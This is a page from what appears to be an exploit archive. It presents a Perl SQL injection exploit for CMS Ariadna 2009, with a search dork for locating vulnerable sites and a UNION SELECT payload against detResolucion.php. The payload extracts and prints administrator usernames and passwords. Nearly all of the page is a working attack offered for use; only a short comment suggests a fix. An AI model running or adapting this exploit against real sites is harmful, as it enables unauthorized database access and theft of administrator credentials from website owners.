[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CMS Ariadna 2009 SQL Injection
# Published : 2010-04-19
# Author : Andrés Gómez
# Previous Title : Joomla Component GBU FACEBOOK SQL injection vulnerability
# Next Title : Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability


# Exploit Title : CMS Ariadna 2009 SQL Injection
# Date : 2010-04-19
# Author : Andrés Gómez
# Contact : gomezandres@adinet.com.uy
# Dork : "allinurl: detResolucion.php?tipodoc_id="
########################################################################
Exploit in Perl Start In Next Line:

use LWP::Simple;

########################################################################
# Malicious users may inject SQL querys into a vulnerable
# application to fool a user in order to gather data from them or see
sensible information.
########################################################################
# Solution:
# $_GET = preg_replace("|([^ws'])|i",'',$_GET);
# $_POST = preg_replace("|([^ws'])|i",'',$_POST);
########################################################################
# Special Thanks : HYPERNETHOST & Security-Pentest & Mauro Rossi
##########################[Andrés Gómez]#################################

my $target = $ARGV[0];
unless ($target) { print "n Inyector Remoto -- HYPERNETHOST &
Security-Pentest -- Andres Gomeznn";
print " Dork: allinurl: detResolucion.php?tipodoc_id=n";
print "nEjemplo Ejecucion = AriadnaCms.pl
http://www.sitio.extension/path/n" ; exit 1; }

$sql =
"detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";

$final = $target.$sql;
$contenido = get($final);

print "nn[+] Pagina Web: $targetnn";
if ($contenido =~/security(.*):pentest(.*)/) {
print "[-] Datos extraidos con exito:nn";
print "[+] Usuario = $1n";
print "[+] Password = $2n";
} else {
print "[-] No se obtuvieron datosnn";
exit 1;
}

print "n[?] Escriba exit para salir de la aplicacionn";

exit 1;